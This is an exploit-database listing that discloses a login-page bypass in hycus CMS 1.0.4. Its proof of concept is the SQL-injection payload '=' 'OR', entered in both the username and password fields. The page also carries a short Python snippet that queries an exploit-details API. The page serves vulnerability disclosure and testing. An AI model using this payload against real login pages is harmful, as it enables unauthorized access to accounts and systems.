Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
"Berk Dusunur"
Platform
php
Release date
2018-06-28
1 2 3 4 5 6 7 8 9 10 11 12 13 | # Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass # Google Dork:N/A # Date: 28.06.2018 # Exploit Author: Berk Dusunur # Vendor Homepage: http://www.hycus.com/ # Software Link: http://demosite.center/hycus/ # Version: 1.0.4 # Tested on: Pardus / Debian Web Server # CVE : N/A #Proof Of Concept use login bypass payload for username= '=' 'OR' for password= '=' 'OR' |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44954/?format=json')
For full documentation follow the link above